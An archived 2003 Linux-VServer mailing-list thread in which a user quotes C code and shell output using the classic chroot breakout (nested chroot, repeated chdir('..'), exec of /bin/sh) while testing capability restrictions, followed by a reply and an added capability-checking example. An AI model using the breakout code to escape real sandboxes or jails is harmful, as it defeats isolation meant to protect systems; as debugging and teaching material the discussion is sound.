
From: Herbert Poetzl (herbert_at_13thfloor.at)
Date: Thu 30 Oct 2003 - 11:30:18 GMT


On Wed, Oct 29, 2003 at 11:36:42PM -0600, Linas Vepstas wrote:
>
> Hi,
>
> I'm having problems testing chroot with chcontext ... it seems broken
> for me. Maybe I'm doing something wrong. Anyone know if the following
> should have worked?
>
> I assumed that taking away CAP_SYS_CHROOT would not let me
> break out of chroot jails but it seems that I can break out
> after all. I'm gonna try to see if this is a kernel bug
> tomorrow ... or if I'm just entertaining false hopes...

hmm, after --cap '!CAP_SYS_CHROOT', you should not be able
to perform chroot() at all ... and I don't see any reason
why the chroot() in your example should have worked ...

so of course you can break out of a chroot that didn't happen
but what is the point of that?

confused,
Herbert

> The way I understand it, chcontext should have set 'the cap ceiling'
> which means that children cannot inherit anything looser ...
>
> xx:~/mnt# chcontext --secure --cap '!CAP_SYS_CHROOT' /bin/sh
> New security context is 14
> xx:~/mnt# ps ax
> PID TTY STAT TIME COMMAND
> 1 ? S 0:12 init [2]
> 27797 pts/1 S 0:00 /bin/sh
> 27798 pts/1 R 0:00 ps ax
> xx:~/mnt# getpcaps 27797
> Capabilities for `27797': =
> cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_net_bind_service,cap_sys_ptrace,cap_sys_tty_config,cap_lease+ep
> xx:~/mnt# vi c.c
>
> #include <stdlib.h>
> #include <stdio.h>
> #include <unistd.h>
> #include <sys/stat.h>
> #include <sys/types.h>
>
> int main(void)
> {
>     char buff[100];
>     int i;
>     // chdir("/root/mnt/breakout");
>     // chroot("/root/mnt/breakout");
>
>     getcwd(buff, sizeof buff);
>     printf("duude we are in %s\n", buff);
>
>     /* Create a subdirectory and try to chroot into it. Without
>      * CAP_SYS_CHROOT this call fails with EPERM, so check its result. */
>     mkdir("bust", 0700);
>     if (chroot("bust") != 0)
>         perror("chroot(\"bust\")");
>     getcwd(buff, sizeof buff);
>     printf("duude we are in %s\n", buff);
>
>     /* Walk upwards; the cwd was never moved inside the new root. */
>     for (i = 0; i < 10; i++) {
>         chdir("..");
>         getcwd(buff, sizeof buff);
>         printf("by bye duude we are in %s\n", buff);
>     }
>     if (chroot(".") != 0)
>         perror("chroot(\".\")");
>     execl("/bin/sh", "/bin/sh", (char *)NULL);
>     perror("execl");
>     return 1;
> }
>
> xx:~/mnt# cc -static c.c
> xx:~/mnt# ./a.out
> duude we are in /root/mnt
> duude we are in /root/mnt
> by bye duude we are in /root
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> xx:/# ^D exit
> xx:~/mnt# mount
> [... stuff deleted ...]
> /root/tmp on /root/mnt type none (rw,bind)
>
> xx:~/mnt# cat /proc/version
>
> Linux version 2.4.22ctx-17c (root_at_xx) (gcc version 3.3.2
> 20030908 (Debian prerelease)) #3 SMP Fri Oct 24 22:34:38 CDT 2003
>
> This was a standard Marcello kernel before the ctx-17c patch ...
> I'm running on i386 arch.
>
>
> --linas
>
> --
> pub 1024D/01045933 2001-02-01 Linas Vepstas (Labas!) <linas_at_linas.org>
> PGP Key fingerprint = 8305 2521 6000 0B5E 8984 3F54 64A9 9A82 0104 5933
> _______________________________________________
> Vserver mailing list
> Vserver_at_list.linux-vserver.org
> http://list.linux-vserver.org/mailman/listinfo/vserver
_______________________________________________
Vserver mailing list
Vserver_at_www.solucorp.qc.ca
http://www.solucorp.qc.ca/mailman/listinfo/vserver
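A check that follows from Herbert's point, as an added example that is not code from the thread: before concluding that a capability restriction did or did not hold, read the process's effective set (the CapEff line of /proc/<pid>/status) and test the bit, rather than inferring it from whether a later chroot() "worked". The status text below is constructed to match the getpcaps output quoted above (bits 0-7, 10, 19, 26 and 28 set, CAP_SYS_CHROOT absent); the capability numbers are the standard Linux ones from linux/capability.h.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

/* Capability numbers as defined in <linux/capability.h>; repeated here so
 * the example builds on any platform. */
#define CAP_SYS_CHROOT 18
#define CAP_SYS_PTRACE 19

/* Constructed sample status text matching the getpcaps output in the thread. */
static const char SAMPLE_STATUS[] = "Name:\tsh\nCapEff:\t00000000140804ff\n";

/* Return 1 if capability `cap` is set in a CapEff-style hex mask,
 * 0 if clear, -1 if the string is not a valid hex mask. */
int mask_has_cap(const char *hex, int cap)
{
    char *end;
    unsigned long long mask;
    if (cap < 0 || cap > 63) return -1;
    errno = 0;
    mask = strtoull(hex, &end, 16);
    if (errno != 0 || end == hex || *end != '\0') return -1;
    return (int)((mask >> cap) & 1ULL);
}

/* Locate "CapEff:" in /proc/<pid>/status-formatted text and copy its hex
 * digits into `out`. Returns 1 on success, 0 if the line is missing. */
int find_cap_eff(const char *status_text, char *out, size_t outlen)
{
    const char *p = strstr(status_text, "CapEff:");
    if (!p) return 0;
    p += strlen("CapEff:");
    while (*p == ' ' || *p == '\t') p++;
    size_t n = strspn(p, "0123456789abcdefABCDEF");
    if (n == 0 || n >= outlen) return 0;
    memcpy(out, p, n);
    out[n] = '\0';
    return 1;
}

/* Live check: does the calling process hold `cap` in its effective set?
 * Returns 1/0, or -1 when /proc/self/status cannot be read (non-Linux). */
int self_has_cap(int cap)
{
    char buf[4096], hex[32];
    FILE *f = fopen("/proc/self/status", "r");
    if (!f) return -1;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    if (!find_cap_eff(buf, hex, sizeof hex)) return -1;
    return mask_has_cap(hex, cap);
}
```

Run `self_has_cap(CAP_SYS_CHROOT)` inside the restricted shell: a 0 means the ceiling applied and any chroot() in that context must return -1 with EPERM.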


Generated on Thu 30 Oct 2003 - 11:41:22 GMT by hypermail 2.1.3